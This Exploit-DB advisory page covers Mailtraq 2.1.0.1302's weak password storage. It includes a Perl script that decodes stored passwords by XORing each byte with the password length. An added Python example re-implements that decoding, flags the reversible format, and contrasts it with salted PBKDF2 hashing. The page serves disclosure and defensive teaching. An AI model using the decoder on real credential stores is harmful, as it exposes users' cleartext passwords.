Mailtraq - User Password Encoding Weakness

ID EDB-ID:22779
Type exploitdb
Reporter Noam Rathaus
Modified 2003-06-16T00:00:00


Mailtraq 2.1.0.1302 User Password Encoding Weakness. Local exploit for Windows platform.


It has been reported that Mailtraq does not securely store passwords. Because of this, an attacker may have an increased chance of gaining access to cleartext passwords.


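# Decodes a Mailtraq-encoded password: each byte is XORed with the password length.
use strict;
use warnings;

my $Password = $ARGV[0];

print "Passwords should be something like: \\3D66656463626160\n";
print "Provided password: $Password\n";

# Drop the leading "\3D" marker; the rest is two hex digits per character.
$Password = substr($Password, 3);
my $Length = length($Password) / 2;

print "Length: $Length\n";

for (my $i = 0; $i < $Length; $i++) {
    print "Decoding: ", substr($Password, $i*2, 2), " = ";
    my $ord = hex(substr($Password, $i*2, 2));

    # XOR with the password length recovers the original character code.
    my $plain = $ord ^ $Length;
    print $plain, " (", chr($plain), ")\n";
}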
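
The weakness next to a hardened form, as an added example that is not part of the original advisory or of Mailtraq's code. The encoder is inferred from the decoder above (uppercase hex and latin-1 bytes are assumptions), and the function names, the `pbkdf2$salt$digest` layout and the iteration count are this example's own choices.

```python
import hashlib
import hmac
import os
import re

PREFIX = "\\3D"  # marker taken from the page's sample value
ENCODED_RE = re.compile(r"^\\3D(?:[0-9A-Fa-f]{2})+$")
ITERATIONS = 600_000  # assumed work factor for PBKDF2-HMAC-SHA256


def mailtraq_encode(password: str) -> str:
    """Encoding inferred from the decoder: every byte XOR the password length."""
    data = password.encode("latin-1")
    if len(data) > 255:
        raise ValueError("length no longer fits in one byte")
    return PREFIX + "".join(f"{b ^ len(data):02X}" for b in data)


def mailtraq_decode(stored: str) -> str:
    """Same steps as the Perl script: strip the marker, XOR with the length."""
    raw = bytes.fromhex(stored[len(PREFIX):])
    return bytes(b ^ len(raw) for b in raw).decode("latin-1")


def is_reversible_format(stored: str) -> bool:
    """Audit check: flags a stored value that uses the reversible format."""
    return bool(ENCODED_RE.match(stored))


def hash_password(password: str, salt: bytes = b"") -> str:
    """Hardened storage: salted PBKDF2, one-way, random salt per password."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt; compare in constant time."""
    _, salt_hex, digest_hex = stored.split("$")
    salt = bytes.fromhex(salt_hex)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    sample = "\\3D66656463626160"  # sample value printed by the page's script
    print(mailtraq_decode(sample))  # recovered with no key or secret
    hashed = hash_password("abcdefg")
    print(is_reversible_format(sample), is_reversible_format(hashed))
    print(verify_password("abcdefg", hashed))
```

The stored value also reveals the password length (half the hex digit count), which is the only "key" the encoding uses.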